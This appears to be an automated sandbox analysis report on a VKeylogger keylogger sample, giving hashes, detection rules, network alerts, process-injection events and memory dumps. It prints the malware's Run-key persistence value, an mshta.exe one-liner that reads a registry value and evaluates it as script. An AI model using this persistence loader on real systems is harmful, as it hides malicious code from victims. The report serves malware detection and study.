vkeylogger | 04b8f38bffca4122470e8af1b123630809bc7a6fb4e66a3e0a99f82133c9bdf1

General

Target

f876084f0a4c4921043f0c5d9a300a10.exe
Size

295KB
MD5

f876084f0a4c4921043f0c5d9a300a10
SHA1

26750325c38616947a66fcf4132afd30bdccbbe6
SHA256

04b8f38bffca4122470e8af1b123630809bc7a6fb4e66a3e0a99f82133c9bdf1
SHA512

577f59015f58f6a7f6353b183293d834bea07aed8bf970a14888551239c3cca1eb4915ea3768efa697c82a53d33be50eb3a4d279c0ce4a77eb700f8045117587

Score

10^/10

vkeylogger keylogger persistence stealer suricata

Malware Config

Signatures

VKeylogger
A keylogger first seen in Nov 2020.
stealer keylogger vkeylogger

VKeylogger Payload 3 IoCs

resource	yara_rule
behavioral1/memory/1932-57-0x00000000001B0000-0x00000000001C2000-memory.dmp	family_vkeylogger
behavioral1/memory/1932-58-0x0000000000400000-0x0000000000474000-memory.dmp	family_vkeylogger
behavioral1/memory/524-61-0x0000000000080000-0x0000000000093000-memory.dmp	family_vkeylogger

suricata: ET MALWARE Generic -POST To gate.php w/Extended ASCII Characters (Likely Zeus Derivative)
suricata: ET MALWARE Generic -POST To gate.php w/Extended ASCII Characters (Likely Zeus Derivative)
suricata
suricata: ET MALWARE Generic Request to gate.php Dotted-Quad
suricata: ET MALWARE Generic Request to gate.php Dotted-Quad
suricata
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
suricata
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
suricata
suricata: ET MALWARE Win32/Spy.Agent.QAQ Variant CnC Activity
suricata: ET MALWARE Win32/Spy.Agent.QAQ Variant CnC Activity
suricata

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Windows\CurrentVersion\Run\ghtrh = "C:\\Windows\\system32\\mshta.exe javascript:x=new%20ActiveXObject(\"wscript.shell\");v=x.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\SMSvcHost\\\\ComponentID\");eval(v);"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Windows\CurrentVersion\Run\mfoedmf = "C:\\Users\\Admin\\AppData\\Local\\Temp\\f876084f0a4c4921043f0c5d9a300a10.exe"	explorer.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1932 set thread context of 524	1932	f876084f0a4c4921043f0c5d9a300a10.exe	27

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
1932	f876084f0a4c4921043f0c5d9a300a10.exe
524	explorer.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
524	explorer.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
524	explorer.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1932 wrote to memory of 524	1932	f876084f0a4c4921043f0c5d9a300a10.exe	27
PID 1932 wrote to memory of 524	1932	f876084f0a4c4921043f0c5d9a300a10.exe	27
PID 1932 wrote to memory of 524	1932	f876084f0a4c4921043f0c5d9a300a10.exe	27
PID 1932 wrote to memory of 524	1932	f876084f0a4c4921043f0c5d9a300a10.exe	27

C:\Users\Admin\AppData\Local\Temp\f876084f0a4c4921043f0c5d9a300a10.exe
"C:\Users\Admin\AppData\Local\Temp\f876084f0a4c4921043f0c5d9a300a10.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1932
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\SysWOW64\explorer.exe"
  2⤵
  - Adds Run key to start application
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:524

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/524-60-0x0000000074F71000-0x0000000074F73000-memory.dmp

Filesize
8KB

Download
memory/524-61-0x0000000000080000-0x0000000000093000-memory.dmp

Filesize
76KB

Download
memory/1932-54-0x00000000002CB000-0x00000000002DC000-memory.dmp

Filesize
68KB

Download
memory/1932-55-0x0000000075D31000-0x0000000075D33000-memory.dmp

Filesize
8KB

Download
memory/1932-57-0x00000000001B0000-0x00000000001C2000-memory.dmp

Filesize
72KB

Download
memory/1932-58-0x0000000000400000-0x0000000000474000-memory.dmp

Filesize
464KB

Download
memory/1932-56-0x00000000002CB000-0x00000000002DC000-memory.dmp

Filesize
68KB

Download

Analysis

Sharing